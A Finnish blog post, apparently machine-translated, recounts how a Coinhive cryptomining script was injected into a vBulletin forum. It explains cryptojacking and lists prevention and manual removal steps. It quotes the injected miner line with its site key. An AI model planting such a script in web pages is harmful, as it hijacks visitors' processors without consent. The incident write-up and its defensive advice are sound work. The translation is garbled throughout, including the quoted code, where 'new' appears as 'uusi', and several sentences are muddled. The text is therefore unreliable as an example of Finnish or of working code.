Miten voit poistaa Coinhive-salauskomentosarjan verkkosivustolta

Yleensä vierailin foorumiin joka päivä ja en ollut nähnyt sitä edellisenä päivänä. Joten oletan, että tämä oli tapahtunut jonkin verran yön aikana, kun olin nukkunut.

Käytän vBulletin-ohjelmistoa foorumille, ja se päivitettiin uusimpaan versioon. Lisäksi tämä oli varsin yllättävää meille, koska TheWindowsClub.com-verkkotunnus käyttää Sucuri Web Antivirus & Firewall suojautumaan verkkohäiriöistä ja hyökkäyksistä.

Oma tietokone tietoturvaohjelmisto onnistui pysäyttämään haitallisen komentosarjan käynnissä Windows 10 -tietokoneeseeni. Tarkastin muiden selainten kuten Chrome & Edgen kanssa, ja tulokset olivat samoja.

Kun napsautat hiiren oikealla painikkeella foorumin WWW-sivua ja tarkistat lähdekoodin, huomasin, että se oli CryptoMiner-haittaohjelmia.

Tämä on haitallinen Coinhive Javascript, joka oli saapunut foorumikoodilleni:

var miner = uusi CoinHive.Anonymous ("FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm"); miner.start ();

Joka tapauksessa ensimmäinen asia, jonka tein, Sucurin ihmiset puhdistivat foorumin Coinhive-käsikirjoituksesta, joka oli työnnetty foorumiini muutamassa tunnissa, ja kaikki oli hieno.

Mikä on CoinHive

Coinhive tarjoaa JavaScript-kaivos Moneron salausvaluille, jonka voit upottaa verkkosivustollesi ja käyttää verkkosivujen kävijöiden tietokoneiden suorittimen omia kolikkojasi varten.

Tätä kutsutaan Cryptojacking . Siihen liittyy kaappaamalla käyttäjien selaimet kryptourvallisuuden kaivostoiminnalle. Jotkut sivuston omistajat voivat käyttää sitä itse rahaa - mutta meidän tapauksessa se oli pistetty.

Kun käyttäjä pääsee tartunnan saaneeseen sivustoon, Coinhive JavaScript suorittaa ja kaivata Moneroa käyttäessään käyttäjän CPU-resursseja. Tämä voi johtaa CPU: n kuristukseen ja odottamattomaan uhrin koneen kaatumiseen.

Nyt, jos selaimesi on saastunut, resurssien käyttöaste nousee. Sulje selain ja se laskee. Käyttäjä voi huomata koneen lämmityksen, puhaltimen käynnistyvän nopeasti tai akun tyhjenemisen nopeudesta.

Pyysin kollegani Saurabh Mukhekarin käymään foorumissa käyttäen Mac -kansiasi ja nähdä, mitä tapahtui. No, hänen Mac-tietokoneensa vaikutti myös, kun hän avasi foorumin Safarilla! Hän on yksi niistä älykkäistä Mac OSX -käyttäjistä, jotka käyttävät Mac-tietokoneeseen virustentorjuntaohjelmistoa.

Said Saurabh,

CoinHive-haittaohjelma ei vain kaappaa Windows-tietokoneen vaan myös Macin, koska se on selainpohjainen Javascript-infektio. On hyvä, että en usko myyttiä, että Macille ei tarvita virustorjuntaohjelmistoa, muutoin koneeni olisi saastunut ja Mac olisi jatkanut kolikon irrottamista jollekin muulle.

Estä CoinHive tartuttamaan verkkosivustoasi <

1. Pidä CMS päivitetty uusimpaan versioon.
2. Päivitä hosting-ohjelmisto säännöllisesti (PHP, tietokanta jne.).
3. Älä käytä NULL-malleja tai lisäosia sivustoosi /Varmista verkkosivustosi web-tietoturvatoimittajien, kuten Sucurin, Cloudflare, Wordfence jne.
4. Tee perusvarotoimenpiteitä blogisi suojaamiseksi.
5. CoinHive kaivostyöläisten poistaminen verkkosivustolta

Ensinnäkin sinun on oltava webmaster

Kun virustorjunta havaitsee CoinHive-infektion, napsauta hiiren kakkospainikkeella verkkosivua ja valitse

Lähdekoodi. Seuraavaksi paina Ctrl + F ja etsi "CoinHive". Kun olet tunnistanut haitallisen koodin sijainnin, sinun on tarkasteltava sen sijainti - missä se sijaitsee. Nyt sinun on poistettava se manuaalisesti. Tätä varten sinun tarvitsee hieman koodata tietoa alustastasi. Sinun on löydettävä tartunnan saaneet tiedostot ja poistettava käsikirjoitus käsin. Jos et ole varma siitä, pyydä jotain asiantuntijaa tekemään sen. Koska käytämme Sucuria, annamme heidän tehdä sen.

Kun olet tehnyt niin, tyhjennä palvelimen ja selaimen välimuisti. Jos käytät välimuistiliittymää tai sanot MaxCDN: ää, myös tyhjennä ne välimuistit.

Suojaa kriittisten kaivosten komentojonojen mukaan

Cryptocurrencies & Blockchain -tekniikka vie maailman. Se on vaikuttanut globaaliin talouteen ja aiheuttaa myös teknologiahäiriöitä. Kaikki ovat alkaneet keskittyä tällaiseen tuottoisaan markkinoihin - ja tämä sisältää myös verkkosivujen hakkerit. Kun tuotto kasvaa, meidän on odotettava, että tällaisia ​​tekniikoita käytetään väärin. Se on kaiken kehittyvän teknologian pimeä puoli.

Voimme tehdä parhaita varotoimia milloin tahansa. Sen lisäksi, että käytät hyvästä tietoturvaohjelmistosta Chrome- tai Firefox-laajennusta, joka estää verkkosivustoja käyttämästä suorittimen myötä Cryptocurrency -ohjelmaa - tai vielä paremmin, käytä Anti-WebMiner -ohjelmaa, joka lopettaa Cryptojacking Mining Script -iskujen muuttamalla Hosts-tiedostoa. Se toimii kaikissa selaimissa. Jos olet Mac-käyttäjä, pyydä myös virustentorjuntaohjelmistoa tietokoneellesi.

Jos sinulla on runsaasti varotoimia, jos olet joskus sitä mieltä, että olet käynyt tartunnan saaneessa sivustossa, kannattaa poistaa selaimesi välimuisti ja skannaa koneesi virustentorjuntaohjelmistosi sekä AdwCleanerin avulla.

Pysy turvassa, pysy kuulolla!